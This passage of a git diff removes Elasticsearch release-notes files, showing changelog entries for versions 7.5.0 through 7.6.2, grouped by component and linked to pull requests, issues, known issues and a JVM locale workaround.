{es-pull}47324[#47324] (issue: {es-issue}44175[#44175]) -* Add support for POST requests to SLM Execute API {es-pull}47061[#47061] -* Wait for snapshot completion in SLM snapshot invocation {es-pull}47051[#47051] (issues: {es-issue}38461[#38461], {es-issue}43663[#43663]) -* Add node setting for disabling SLM {es-pull}46794[#46794] (issue: {es-issue}38461[#38461]) -* ILM: parse origination date from index name {es-pull}46755[#46755] (issues: {es-issue}42449[#42449], {es-issue}46561[#46561]) -* [ILM] Add date setting to calculate index age {es-pull}46561[#46561] (issue: {es-issue}42449[#42449]) - -Features/Ingest:: -* Add the ability to require an ingest pipeline {es-pull}46847[#46847] - -Features/Java High Level REST Client:: -* add function submitDeleteByQueryTask in class RestHighLevelClient {es-pull}46833[#46833] -* return Cancellable in RestHighLevelClient {es-pull}45688[#45688] (issue: {es-issue}44802[#44802]) - -Features/Java Low Level REST Client:: -* Add cloudId builder to the HLRC {es-pull}47868[#47868] -* Add support for cancelling async requests in low-level REST client {es-pull}45379[#45379] (issues: {es-issue}43332[#43332], {es-issue}44802[#44802]) - -Features/Monitoring:: -* Remove hard coded version_created in default monitoring alerts {es-pull}47744[#47744] - -Infra/Circuit Breakers:: -* Emit log message when parent circuit breaker trips {es-pull}47000[#47000] -* Fix G1 GC default IHOP {es-pull}46169[#46169] - -Infra/Core:: -* Introduce system JVM options {es-pull}48252[#48252] (issue: {es-issue}48222[#48222]) -* Set start of the week to Monday for root locale {es-pull}43652[#43652] (issues: {es-issue}41670[#41670], {es-issue}42588[#42588], {es-issue}43275[#43275]) - -Infra/Packaging:: -* Package the JDK into jdk.app on macOS {es-pull}48765[#48765] -* Move ES_TMPDIR substitution into jvm options parser {es-pull}47189[#47189] (issue: {es-issue}47133[#47133]) -* Clarify missing java error message {es-pull}46160[#46160] (issue: {es-issue}44139[#44139]) - -Infra/Scripting:: -* Add explanations to script score queries {es-pull}46693[#46693] - -Infra/Settings:: -* Do not reference values for filtered settings {es-pull}48066[#48066] -* Allow setting validation against arbitrary types {es-pull}47264[#47264] (issue: {es-issue}25560[#25560]) -* Clarify error message on keystore write permissions {es-pull}46321[#46321] -* Add more meaningful keystore version mismatch errors {es-pull}46291[#46291] (issue: {es-issue}44624[#44624]) - -Machine Learning:: -* Throw an exception when memory usage estimation endpoint encounters empty data frame. {es-pull}49143[#49143] (issue: {es-issue}49140[#49140]) -* Change format of MulticlassConfusionMatrix result to be more self-explanatory {es-pull}48174[#48174] (issue: {es-issue}46735[#46735]) -* Make num_top_classes parameter's default value equal to 2 {es-pull}48119[#48119] (issue: {es-issue}46735[#46735]) -* [ML] Add option to stop datafeed that finds no data {es-pull}47922[#47922] -* Allow integer types for classification's dependent variable {es-pull}47902[#47902] (issue: {es-issue}46735[#46735]) -* [ML] Add lazy assignment job config option {es-pull}47726[#47726] -* [ML] Additional outlier detection parameters {es-pull}47600[#47600] -* [ML] More accurate job memory overhead {es-pull}47516[#47516] -* [ML] Throttle the delete-by-query of expired results {es-pull}47177[#47177] (issues: {es-issue}47003[#47003], {es-issue}47103[#47103]) - -Mapping:: -* Add migration tool checks for _field_names disabling {es-pull}46972[#46972] (issues: {es-issue}42854[#42854], {es-issue}46681[#46681]) - -Network:: -* Introduce simple remote connection strategy {es-pull}47480[#47480] -* Enhanced logging when transport is misconfigured to talk to HTTP port {es-pull}45964[#45964] (issue: {es-issue}32688[#32688]) - -Recovery:: -* Do not send recovery requests with CancellableThreads {es-pull}46287[#46287] (issue: {es-issue}46178[#46178]) - -SQL:: -* SQL: make date/datetime and interval types compatible in conditional functions {es-pull}47595[#47595] (issue: {es-issue}46674[#46674]) -* SQL: use calendar interval of 1y instead of fixed interval for grouping by YEAR and HISTOGRAMs {es-pull}47558[#47558] (issue: {es-issue}40162[#40162]) -* SQL: Support queries with HAVING over SELECT {es-pull}46709[#46709] (issue: {es-issue}37051[#37051]) -* SQL: Add support for shape type {es-pull}46464[#46464] (issues: {es-issue}43644[#43644], {es-issue}46412[#46412]) - -Search:: -* Remove response search phase from ExpandSearchPhase {es-pull}48401[#48401] -* Add builder for distance_feature to QueryBuilders {es-pull}47846[#47846] (issue: {es-issue}47767[#47767]) -* Fold InitialSearchPhase into AbstractSearchAsyncAction {es-pull}47182[#47182] -* max_children exist only in top level nested sort {es-pull}46731[#46731] -* First round of optimizations for vector functions. {es-pull}46294[#46294] (issues: {es-issue}45390[#45390], {es-issue}45936[#45936], {es-issue}46103[#46103], {es-issue}46155[#46155], {es-issue}46190[#46190], {es-issue}46202[#46202]) -* Throw exception in scroll requests using `from` {es-pull}46087[#46087] (issues: {es-issue}26235[#26235], {es-issue}44493[#44493], {es-issue}9373[#9373]) - -Snapshot/Restore:: -* Track Repository Gen. in BlobStoreRepository {es-pull}48944[#48944] (issues: {es-issue}38941[#38941], {es-issue}47520[#47520], {es-issue}47834[#47834], {es-issue}49048[#49048]) -* Resume partial download from S3 on connection drop {es-pull}46589[#46589] -* More Efficient Ordering of Shard Upload Execution {es-pull}42791[#42791] - -Transform:: -* [ML][Transforms] allow executor to call start on started task {es-pull}46347[#46347] -* [ML-DataFrame] improve error message for timeout case in stop {es-pull}46131[#46131] (issue: {es-issue}45610[#45610]) -* [ML][Data Frame] add support for `wait_for_checkpoint` flag on `_stop` API {es-pull}45469[#45469] (issue: {es-issue}45293[#45293]) - - - -[[bug-7.5.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix ignoring missing values in min/max aggregations {es-pull}48970[#48970] (issue: {es-issue}48905[#48905]) -* DocValueFormat implementation for date range fields {es-pull}47472[#47472] (issues: {es-issue}47323[#47323], {es-issue}47469[#47469]) - -Allocation:: -* Auto-expand replicated closed indices {es-pull}48973[#48973] -* Handle negative free disk space in deciders {es-pull}48392[#48392] (issue: {es-issue}48380[#48380]) -* Dangling indices strip aliases {es-pull}47581[#47581] -* Cancel recoveries even if all shards assigned {es-pull}46520[#46520] -* Fail allocation of new primaries in empty cluster {es-pull}43284[#43284] (issue: {es-issue}41073[#41073]) - -Analysis:: -* Reset Token position on reuse in `predicate_token_filter` {es-pull}47424[#47424] (issue: {es-issue}47197[#47197]) - -Audit:: -* Audit log filter and marker {es-pull}45456[#45456] (issue: {es-issue}47251[#47251]) - -Authentication:: -* Add owner flag parameter to the rest spec {es-pull}48500[#48500] (issue: {es-issue}48499[#48499]) -* Add populate_user_metadata in OIDC realm {es-pull}48357[#48357] (issue: {es-issue}48217[#48217]) -* Remove unnecessary details logged for OIDC {es-pull}48271[#48271] -* Fix AD realm additional metadata {es-pull}47179[#47179] (issue: {es-issue}45848[#45848]) -* Fallback to realm authc if ApiKey fails {es-pull}46538[#46538] -* PKI realm accept only verified certificates {es-pull}45590[#45590] - -Authorization:: -* Fix security origin for TokenService#findActiveTokensFor... {es-pull}47418[#47418] (issue: {es-issue}47151[#47151]) -* Use 'should' clause instead of 'filter' when querying native privileges {es-pull}47019[#47019] -* Do not rewrite aliases on remove-index from aliases requests {es-pull}46989[#46989] -* Validate index and cluster privilege names when creating a role {es-pull}46361[#46361] (issue: {es-issue}29703[#29703]) -* Validate `query` field when creating roles {es-pull}46275[#46275] (issue: {es-issue}34252[#34252]) - -CCR:: -* CCR should auto-retry rejected execution exceptions {es-pull}49213[#49213] -* Do not auto-follow closed indices {es-pull}47721[#47721] (issue: {es-issue}47582[#47582]) -* Relax maxSeqNoOfUpdates assertion in FollowingEngine {es-pull}47188[#47188] (issue: {es-issue}47137[#47137]) -* Handle lower retaining seqno retention lease error {es-pull}46420[#46420] (issues: {es-issue}46013[#46013], {es-issue}46416[#46416]) - -CRUD:: -* Close query cache on index service creation failure {es-pull}48230[#48230] (issue: {es-issue}48186[#48186]) -* Use optype CREATE for single auto-id index requests {es-pull}47353[#47353] -* Ignore replication for noop updates {es-pull}46458[#46458] (issues: {es-issue}41065[#41065], {es-issue}44603[#44603], {es-issue}46366[#46366]) - -Client:: -* Correct default refresh policy for security APIs {es-pull}46896[#46896] - -Cluster Coordination:: -* Ignore metadata of deleted indices at start {es-pull}48918[#48918] -* Omit writing index metadata for non-replicated closed indices on data-only node {es-pull}47285[#47285] (issue: {es-issue}47276[#47276]) -* Assert no exceptions during state application {es-pull}47090[#47090] (issue: {es-issue}47038[#47038]) -* Remove trailing comma from nodes lists {es-pull}46484[#46484] - -Distributed:: -* Closed shard should never open new engine {es-pull}47186[#47186] (issues: {es-issue}45263[#45263], {es-issue}47060[#47060]) -* Fix false positive out of sync warning in synced-flush {es-pull}46576[#46576] (issues: {es-issue}28464[#28464], {es-issue}30244[#30244]) -* Suppress warning logs from background sync on relocated primary {es-pull}46247[#46247] (issues: {es-issue}40800[#40800], {es-issue}42241[#42241]) - -Engine:: -* Greedily advance safe commit on new global checkpoint {es-pull}48559[#48559] (issue: {es-issue}48532[#48532]) - -Features/ILM+SLM:: -* Don't halt policy execution on policy trigger exception {es-pull}49128[#49128] -* Don't schedule SLM jobs when services have been stopped {es-pull}48658[#48658] (issue: {es-issue}47749[#47749]) -* Ensure SLM stats does not block an in-place upgrade from 7.4 {es-pull}48367[#48367] -* Ensure SLM stats does not block an in-place upgrade from 7.4 {es-pull}48361[#48361] -* Add SLM support to xpack usage and info APIs {es-pull}48096[#48096] (issue: {es-issue}43663[#43663]) -* Change policy_id to list type in slm.get_lifecycle {es-pull}47766[#47766] (issue: {es-issue}47765[#47765]) -* Throw error retrieving non-existent SLM policy {es-pull}47679[#47679] (issue: {es-issue}47664[#47664]) -* Handle partial failure retrieving segments in SegmentCountStep {es-pull}46556[#46556] -* Fixes for API specification {es-pull}46522[#46522] - -Features/Indices APIs:: -* Fix Rollover error when alias has closed indices {es-pull}47148[#47148] (issue: {es-issue}47146[#47146]) - -Features/Ingest:: -* Do not wrap ingest processor exception with IAE {es-pull}48816[#48816] (issue: {es-issue}48810[#48810]) -* Introduce dedicated ingest processor exception {es-pull}48810[#48810] (issue: {es-issue}48803[#48803]) -* Allow dropping documents with auto-generated ID {es-pull}46773[#46773] (issue: {es-issue}46678[#46678]) -* Expose cache setting in UserAgentPlugin {es-pull}46533[#46533] - -Features/Java High Level REST Client:: -* fix incorrect comparison {es-pull}48208[#48208] -* Fix ILM HLRC Javadoc->Documentation links {es-pull}48083[#48083] -* Change HLRC count request to accept a QueryBuilder {es-pull}46904[#46904] (issue: {es-issue}46829[#46829]) -* [HLRC] Send min_score as query string parameter to the count API {es-pull}46829[#46829] (issue: {es-issue}46474[#46474]) -* HLRC multisearchTemplate forgot params {es-pull}46492[#46492] (issue: {es-issue}46488[#46488]) -* Added fields for MultiTermVectors (#42232) {es-pull}42877[#42877] (issue: {es-issue}42232[#42232]) - -Features/Java Low Level REST Client:: -* Update http-core and http-client dependencies {es-pull}46549[#46549] (issues: {es-issue}45379[#45379], {es-issue}45577[#45577], {es-issue}45808[#45808]) - -Features/Monitoring:: -* [Monitoring] Add new cluster privilege now necessary for the stack monitoring ui {es-pull}47871[#47871] -* Validating monitoring hosts setting while parsing {es-pull}47246[#47246] (issue: {es-issue}47125[#47125]) - -Features/Watcher:: -* Fix class used to initialize logger in Watcher {es-pull}46467[#46467] -* Fix wrong URL encoding in watcher HTTP client {es-pull}45894[#45894] (issue: {es-issue}44970[#44970]) -* Prevent deadlock by using separate schedulers {es-pull}48697[#48697] (issues: {es-issue}41451[#41451], {es-issue}47599[#47599]) -* Fix cluster alert for watcher/monitoring IndexOutOfBoundsExcep… {es-pull}45308[#45308] (issue: {es-issue}43184[#43184]) - -Geo:: -* Geo: implement proper handling of out of bounds geo points {es-pull}47734[#47734] (issue: {es-issue}43916[#43916]) -* Geo: Fixes indexing of linestrings that go around the globe {es-pull}47471[#47471] (issues: {es-issue}43826[#43826], {es-issue}43837[#43837]) -* Provide better error when updating geo_shape field mapper settings {es-pull}47281[#47281] (issue: {es-issue}47006[#47006]) -* Geo: fix indexing of west to east linestrings crossing the antimeridian {es-pull}46601[#46601] (issue: {es-issue}43775[#43775]) -* Reset queryGeometry in ShapeQueryTests {es-pull}45974[#45974] (issue: {es-issue}45628[#45628]) - -Highlighting:: -* Fix highlighting of overlapping terms in the unified highlighter {es-pull}47227[#47227] -* Fix highlighting for script_score query {es-pull}46507[#46507] (issue: {es-issue}46471[#46471]) - -Infra/Core:: -* Don't drop user's MaxDirectMemorySize flag on jdk8/windows {es-pull}48657[#48657] (issues: {es-issue}44174[#44174], {es-issue}48365[#48365]) -* Warn when MaxDirectMemorySize may be incorrect (Windows/JDK8 only issue) {es-pull}48365[#48365] (issue: {es-issue}47384[#47384]) -* Support optional parsers in any order with DateMathParser and roundup {es-pull}46654[#46654] (issue: {es-issue}45284[#45284]) - -Infra/Logging:: -* SearchSlowLog uses a non thread-safe object to escape json {es-pull}48363[#48363] (issues: {es-issue}44642[#44642], {es-issue}48358[#48358]) - -Infra/Scripting:: -* Drop stored scripts with the old style-id {es-pull}48078[#48078] (issue: {es-issue}47593[#47593]) - -Machine Learning:: -* [ML] Fixes for stop datafeed edge cases {es-pull}49191[#49191] (issues: {es-issue}43670[#43670], {es-issue}48931[#48931]) -* [ML] Avoid NPE when node load is calculated on job assignment {es-pull}49186[#49186] (issue: {es-issue}49150[#49150]) -* Do not throw exceptions resulting from persisting datafeed timing stats. {es-pull}49044[#49044] (issue: {es-issue}49032[#49032]) -* [ML] Deduplicate multi-fields for data frame analytics {es-pull}48799[#48799] (issues: {es-issue}48756[#48756], {es-issue}48770[#48770]) -* [ML] Prevent fetching multi-field from source {es-pull}48770[#48770] (issue: {es-issue}48756[#48756]) -* [ML] Fix detection of syslog-like timestamp in find_file_structure {es-pull}47970[#47970] -* Fix serialization of evaluation response. {es-pull}47557[#47557] -* [ML] Reinstate ML daily maintenance actions {es-pull}47103[#47103] (issue: {es-issue}47003[#47003]) -* [ML] fix two datafeed flush lockup bugs {es-pull}46982[#46982] - -Network:: -* Fix es.http.cname_in_publish_address Deprecation Logging {es-pull}47451[#47451] (issue: {es-issue}47436[#47436]) - -Recovery:: -* Ignore Lucene index in peer recovery if translog corrupted {es-pull}49114[#49114] - -Reindex:: -* Fix issues with serializing BulkByScrollResponse {es-pull}45357[#45357] - -SQL:: -* SQL: Fix issue with mins & hours for DATEDIFF {es-pull}49252[#49252] -* SQL: Fix issue with negative literels and parentheses {es-pull}48113[#48113] (issue: {es-issue}48009[#48009]) -* SQL: add "format" for "full" date range queries {es-pull}48073[#48073] (issue: {es-issue}48033[#48033]) -* SQL: Fix arg verification for DateAddProcessor {es-pull}48041[#48041] -* SQL: Fix Nullability of DATEADD {es-pull}47921[#47921] -* SQL: Allow whitespaces in escape patterns {es-pull}47577[#47577] (issue: {es-issue}47401[#47401]) -* SQL: fix multi full-text functions usage with aggregate functions {es-pull}47444[#47444] (issue: {es-issue}47365[#47365]) -* SQL: Check case where the pivot limit is reached {es-pull}47121[#47121] (issue: {es-issue}47002[#47002]) -* SQL: Properly handle indices with no/empty mapping {es-pull}46775[#46775] (issue: {es-issue}46757[#46757]) -* SQL: improve ResultSet behavior when no rows are available {es-pull}46753[#46753] (issue: {es-issue}46750[#46750]) -* SQL: use the correct data type for types conversion {es-pull}46574[#46574] (issue: {es-issue}46090[#46090]) -* SQL: Fix issue with common type resolution {es-pull}46565[#46565] (issue: {es-issue}46551[#46551]) -* SQL: fix scripting for grouped by datetime functions {es-pull}46421[#46421] (issue: {es-issue}40241[#40241]) -* SQL: Use null schema response {es-pull}46386[#46386] (issue: {es-issue}46381[#46381]) -* SQL: Fix issue with IIF function when condition folds {es-pull}46290[#46290] (issue: {es-issue}46268[#46268]) -* SQL: Fix issue with DataType for CASE with NULL {es-pull}46173[#46173] (issue: {es-issue}46032[#46032]) -* SQL: Failing Group By queries due to different ExpressionIds {es-pull}43072[#43072] (issues: {es-issue}33361[#33361], {es-issue}34543[#34543], {es-issue}36074[#36074], {es-issue}37044[#37044], {es-issue}40001[#40001], {es-issue}40240[#40240], {es-issue}41159[#41159], {es-issue}42041[#42041], {es-issue}46316[#46316]) -* SQL: wrong number of values for columns {es-pull}42122[#42122] - -Search:: -* Lucene#asSequentialBits gets the leadCost backwards. {es-pull}48335[#48335] -* Ensure that we don't call listener twice when detecting a partial failures in _search {es-pull}47694[#47694] -* Fix alias field resolution in match query {es-pull}47369[#47369] -* Multi-get requests should wait for search active {es-pull}46283[#46283] (issue: {es-issue}27500[#27500]) -* Resolve the incorrect scroll_current when delete or close index {es-pull}45226[#45226] -* Don't apply the plugin's reader wrapper in can_match phase {es-pull}47816[#47816] (issue: {es-issue}46817[#46817]) - -Security:: -* Remove uniqueness constraint for API key name and make it optional {es-pull}47549[#47549] (issue: {es-issue}46646[#46646]) -* Initialize document subset bit set cache used for DLS {es-pull}46211[#46211] (issue: {es-issue}45147[#45147]) - -Snapshot/Restore:: -* Fix RepoCleanup not Removed on Master-Failover {es-pull}49217[#49217] -* Make FsBlobContainer Listing Resilient to Concurrent Modifications {es-pull}49142[#49142] (issue: {es-issue}37581[#37581]) -* Fix SnapshotShardStatus Reporting for Failed Shard {es-pull}48556[#48556] (issue: {es-issue}48526[#48526]) -* Cleanup Concurrent RepositoryData Loading {es-pull}48329[#48329] (issue: {es-issue}48122[#48122]) -* Fix Bug in Azure Repo Exception Handling {es-pull}47968[#47968] -* Make loadShardSnapshot Exceptions Consistent {es-pull}47728[#47728] (issue: {es-issue}47507[#47507]) -* Fix Snapshot Corruption in Edge Case {es-pull}47552[#47552] (issues: {es-issue}46250[#46250], {es-issue}47550[#47550]) -* Fix Bug in Snapshot Status Response Timestamps {es-pull}46919[#46919] (issue: {es-issue}46913[#46913]) -* Normalize Blob Store Repo Paths {es-pull}46869[#46869] (issue: {es-issue}41814[#41814]) -* GCS deleteBlobsIgnoringIfNotExists should catch StorageException {es-pull}46832[#46832] (issue: {es-issue}46772[#46772]) -* Execute SnapshotsService Error Callback on Generic Thread {es-pull}46277[#46277] -* Make Snapshot Logic Write Metadata after Segments {es-pull}45689[#45689] (issue: {es-issue}41581[#41581]) - -Store:: -* Allow truncation of clean translog {es-pull}47866[#47866] - -Task Management:: -* Fix .tasks index strict mapping: parent_id should be parent_task_id {es-pull}48393[#48393] - -Transform:: -* [Transform] do not fail checkpoint creation due to global checkpoint mismatch {es-pull}48423[#48423] (issue: {es-issue}48379[#48379]) -* [7.5][Transform] prevent assignment if any node is older than 7.4 {es-pull}48055[#48055] (issue: {es-issue}48019[#48019]) -* [Transform] prevent assignment to nodes older than 7.4 {es-pull}48044[#48044] (issue: {es-issue}48019[#48019]) -* [ML][Transforms] fix bwc serialization with 7.3 {es-pull}48021[#48021] -* [ML][Transforms] signal listener early on task _stop failure {es-pull}47954[#47954] -* [ML][Transform] Use field_caps API for mapping deduction {es-pull}46703[#46703] (issue: {es-issue}46694[#46694]) -* [ML-DataFrame] Fix off-by-one error in checkpoint operations_behind {es-pull}46235[#46235] - - - -[[regression-7.5.0]] -[discrete] -=== Regressions - -Aggregations:: -* Implement rounding optimization for fixed offset timezones {es-pull}46670[#46670] (issue: {es-issue}45702[#45702]) - -Infra/Core:: -* [Java.time] Support partial parsing {es-pull}46814[#46814] (issues: {es-issue}45284[#45284], {es-issue}47473[#47473]) -* Enable ResolverStyle.STRICT for java formatters {es-pull}46675[#46675] - - - -[[upgrade-7.5.0]] -[discrete] -=== Upgrades - -Infra/Scripting:: -* Update mustache dependency to 0.9.6 {es-pull}46243[#46243] - -Snapshot/Restore:: -* Update AWS SDK for repository-s3 plugin to support IAM Roles for Service Accounts {es-pull}46969[#46969] -* Upgrade to Azure SDK 8.4.0 {es-pull}46094[#46094] - -Store:: -* Upgrade to Lucene 8.3. {es-pull}48829[#48829] diff --git a/docs/reference/release-notes/7.6.asciidoc b/docs/reference/release-notes/7.6.asciidoc deleted file mode 100644 index bc05e6d81d0..00000000000 --- a/docs/reference/release-notes/7.6.asciidoc +++ /dev/null @@ -1,742 +0,0 @@ -[[release-notes-7.6.2]] -== {es} version 7.6.2 - -Also see <>. - -[[breaking-7.6.2]] -[discrete] -=== Breaking changes - -Authorization:: -* Creation of derived API keys (keys created by existing keys) now requires explicit "no privileges" configuration {es-pull}53647[#53647], https://www.elastic.co/community/security[CVE-2020-7009] - -[[bug-7.6.2]] -[discrete] -=== Bug fixes - -Allocation:: -* Improve performance of shards limits decider {es-pull}53577[#53577] (issue: {es-issue}53559[#53559]) - -Authentication:: -* Fix potential bug in concurrent token refresh support {es-pull}53668[#53668] - -CCR:: -* Handle no such remote cluster exception in ccr {es-pull}53415[#53415] (issue: {es-issue}53225[#53225]) - -Distributed:: -* Execute retention lease syncs under system context {es-pull}53838[#53838] (issues: {es-issue}48430[#48430], {es-issue}53751[#53751]) - -Engine:: -* Fix doc_stats and segment_stats of ReadOnlyEngine {es-pull}53345[#53345] (issues: {es-issue}51303[#51303], {es-issue}51331[#51331]) - -Features/ILM+SLM:: -* Fix null config in SnapshotLifecyclePolicy.toRequest {es-pull}53328[#53328] (issues: {es-issue}44465[#44465], {es-issue}53171[#53171]) -* ILM Freeze step retry when not acknowledged {es-pull}53287[#53287] - -Features/Ingest:: -* Fix ingest pipeline _simulate api with empty docs never returns a res… {es-pull}52937[#52937] (issue: {es-issue}52833[#52833]) - -Features/Java High Level REST Client:: -* Add unsupported parameters to HLRC search request {es-pull}53745[#53745] -* Fix AbstractBulkByScrollRequest slices parameter via Rest {es-pull}53068[#53068] (issue: {es-issue}53044[#53044]) - -Features/Watcher:: -* Disable Watcher script optimization for stored scripts {es-pull}53497[#53497] (issue: {es-issue}40212[#40212]) - -Infra/Core:: -* Avoid self-suppression on grouped action listener {es-pull}53262[#53262] (issue: {es-issue}53174[#53174]) - -Infra/Packaging:: -* Handle special characters and spaces in JAVA_HOME path in elasticsearch-service.bat {es-pull}52676[#52676] - -Infra/Plugins:: -* Ensure only plugin REST tests are run for plugins {es-pull}53184[#53184] (issues: {es-issue}52114[#52114], {es-issue}53183[#53183]) - -Machine Learning:: -* Fix a bug in the calculation of the minimum loss leaf values for classification {ml-pull}1032[#1032] - -Network:: -* Invoke response handler on failure to send {es-pull}53631[#53631] - -SQL:: -* Fix NPE for parameterized LIKE/RLIKE {es-pull}53573[#53573] (issue: {es-issue}53557[#53557]) -* Add support for index aliases for SYS COLUMNS command {es-pull}53525[#53525] (issue: {es-issue}31609[#31609]) -* Fix issue with LIKE/RLIKE as painless script {es-pull}53495[#53495] (issue: {es-issue}53486[#53486]) -* Fix column size for IP data type {es-pull}53056[#53056] (issue: {es-issue}52762[#52762]) - -Search:: -* Fix Term Vectors with artificial docs and keyword fields {es-pull}53504[#53504] (issue: {es-issue}53494[#53494]) -* Fix concurrent requests race over scroll context limit {es-pull}53449[#53449] -* Fix pre-sorting of shards in the can_match phase {es-pull}53397[#53397] -* Fix potential NPE in FuzzyTermsEnum {es-pull}53231[#53231] (issue: {es-issue}52894[#52894]) - -[[upgrade-7.6.2]] -[discrete] -=== Upgrades - -Infra/Core:: -* Update jackson-databind to 2.8.11.6 {es-pull}53522[#53522] (issue: {es-issue}45225[#45225]) - -[[release-notes-7.6.1]] -== {es} version 7.6.1 - -Also see <>. - -[[bug-7.6.1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Decode max and min optimization more carefully {es-pull}52336[#52336] (issue: {es-issue}52220[#52220]) -* Fix a DST error in date_histogram {es-pull}52016[#52016] (issue: {es-issue}50265[#50265]) - -Audit:: -* Logfile audit settings validation {es-pull}52537[#52537] (issues: {es-issue}47038[#47038], {es-issue}47711[#47711], {es-issue}52357[#52357]) - -CCR:: -* Fix shard follow task cleaner under security {es-pull}52347[#52347] (issues: {es-issue}44702[#44702], {es-issue}51971[#51971]) - -Features/cat APIs:: -* Fix NPE in RestPluginsAction {es-pull}52620[#52620] (issue: {es-issue}45321[#45321]) - -Features/ILM+SLM:: -* ILM fix the init step to actually be retryable {es-pull}52076[#52076] - -Features/Ingest:: -* Handle errors when evaluating if conditions in processors {es-pull}52543[#52543] (issue: {es-issue}52339[#52339]) - -Features/Monitoring:: -* Fix NPE in cluster state collector for monitoring {es-pull}52371[#52371] (issue: {es-issue}52317[#52317]) - -Features/Stats:: -* Switch to AtomicLong for "IngestCurrent" metric to prevent negative values {es-pull}52581[#52581] (issues: {es-issue}52406[#52406], {es-issue}52411[#52411]) - -Infra/Packaging:: -* Limit _FILE env var support to specific vars {es-pull}52525[#52525] (issue: {es-issue}52503[#52503]) - -Machine Learning:: -* Don't return inflated definition when storing trained models {es-pull}52573[#52573] -* Validate tree feature index is within range {es-pull}52460[#52460] - -Network:: -* Remove seeds dependency for remote cluster settings {es-pull}52796[#52796] - -Reindex:: -* Allow comma separated source indices {es-pull}52044[#52044] (issue: {es-issue}51949[#51949]) - -SQL:: -* Supplement input checks on received request parameters {es-pull}52229[#52229] -* Fix issue with timezone when paginating {es-pull}52101[#52101] (issue: {es-issue}51258[#51258]) -* Fix ORDER BY on aggregates and GROUPed BY fields {es-pull}51894[#51894] (issue: {es-issue}50355[#50355]) -* Fix milliseconds handling in intervals {es-pull}51675[#51675] (issue: {es-issue}41635[#41635]) -* Selecting a literal from grouped by query generates error {es-pull}41964[#41964] (issues: {es-issue}41413[#41413], {es-issue}41951[#41951]) - -Snapshot/Restore:: -* Fix Non-Verbose Snapshot List Missing Empty Snapshots {es-pull}52433[#52433] - -Store:: -* Fix synchronization in ByteSizeCachingDirectory {es-pull}52512[#52512] - - - -[[upgrade-7.6.1]] -[discrete] -=== Upgrades - -Authentication:: -* Update oauth2-oidc-sdk to 7.0 {es-pull}52489[#52489] (issue: {es-issue}48409[#48409]) - -[[release-notes-7.6.0]] -== {es} version 7.6.0 - -Also see <>. - -[[known-issues-7.6.0]] -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - -* Slow loggers can cause Log4j loggers to leak over time. When a new index is created, - a new Log4j logger is associated with it. However, when an index is deleted, - Log4j keeps an internal reference to its loggers that results in a memory leak (issue: {es-issue}56171[#56171]) -+ -This issue is fixed in {es} 6.8.10 and 7.7.1. - -* Week-based date patterns are not working correctly with `Y`. Using `Y` with `w` will result in -a failed request and an exception in the logs (issue: {es-issue}57128[#57128]). Using `y` with `w` results in -incorrect date calculations. A workaround is to add the following line to the `jvm.options` file. -+ -[source,shell] --------------------------------------------- -9-:-Djava.locale.providers=SPI,COMPAT --------------------------------------------- -+ -This issue is fixed in {es} 7.7.0 and later versions (issue: {es-issue}50916[#50916]). - -[[breaking-7.6.0]] -[discrete] -=== Breaking changes - -[[breaking-java-7.6.0]] -[discrete] -=== Breaking Java changes - -Security:: -* Support Client and RoleMapping in custom Realms {es-pull}50534[#50534] (issue: {es-issue}48369[#48369]) - - - -[[deprecation-7.6.0]] -[discrete] -=== Deprecations - -Analysis:: -* Deprecate and remove camel-case nGram and edgeNGram tokenizers {es-pull}50862[#50862] (issue: {es-issue}50561[#50561]) - -Authorization:: -* Deprecating kibana_user and kibana_dashboard_only_user roles {es-pull}46456[#46456] - -Distributed:: -* Deprecate synced flush {es-pull}50835[#50835] (issue: {es-issue}50776[#50776]) -* Deprecate indices without soft-deletes {es-pull}50502[#50502] - -Features/Indices APIs:: -* Emit warnings when index templates have multiple mappings {es-pull}50982[#50982] -* Ensure we emit a warning when using the deprecated 'template' field. {es-pull}50831[#50831] (issue: {es-issue}49460[#49460]) - -Infra/Core:: -* Deprecate the 'local' parameter of /_cat/nodes {es-pull}50499[#50499] (issue: {es-issue}50088[#50088]) - -Reindex:: -* Deprecate sorting in reindex {es-pull}49458[#49458] (issue: {es-issue}47567[#47567]) - -Search:: -* Deprecate loading fielddata on _id field {es-pull}49166[#49166] (issues: {es-issue}26472[#26472], {es-issue}43599[#43599]) -* Update the signature of vector script functions. {es-pull}48604[#48604] -* Deprecate the sparse_vector field type. {es-pull}48315[#48315] -* Add a deprecation warning regarding allocation awareness in search request {es-pull}48351[#48351] (issue: {es-issue}43453[#43453]) - - -[[feature-7.6.0]] -[discrete] -=== New features - -Aggregations:: -* New Histogram field mapper that supports percentiles aggregations. {es-pull}48580[#48580] (issue: {es-issue}48578[#48578]) -* Implement stats aggregation for string terms {es-pull}47468[#47468] - -Analysis:: -* Implement Lucene EstonianAnalyzer, Stemmer {es-pull}49149[#49149] (issue: {es-issue}48895[#48895]) - -Authentication:: -* Password Protected Keystore (Feature Branch) {es-pull}49210[#49210] - -Features/ILM+SLM:: -* ILM action to wait for SLM policy execution {es-pull}50454[#50454] (issue: {es-issue}45067[#45067]) -* Add ILM histore store index {es-pull}50287[#50287] (issue: {es-issue}49180[#49180]) - -Features/Ingest:: -* CSV processor {es-pull}49509[#49509] (issue: {es-issue}49113[#49113]) - -Machine Learning:: -* Implement `precision` and `recall` metrics for classification evaluation {es-pull}49671[#49671] (issue: {es-issue}48759[#48759]) -* Explain data frame analytics API {es-pull}49455[#49455] -* Machine learning model inference ingest processor {es-pull}49052[#49052] -* Implement accuracy metric for multi-class classification {es-pull}47772[#47772] (issue: {es-issue}48759[#48759]) -* Add feature importance values to classification and regression results (using tree -SHapley Additive exPlanation, or SHAP) {ml-pull}857[#857] - -Mapping:: -* Add per-field metadata. {es-pull}49419[#49419] (issue: {es-issue}33267[#33267]) - -Search:: -* Add fuzzy intervals source {es-pull}49762[#49762] (issue: {es-issue}49595[#49595]) -* Add a listener to 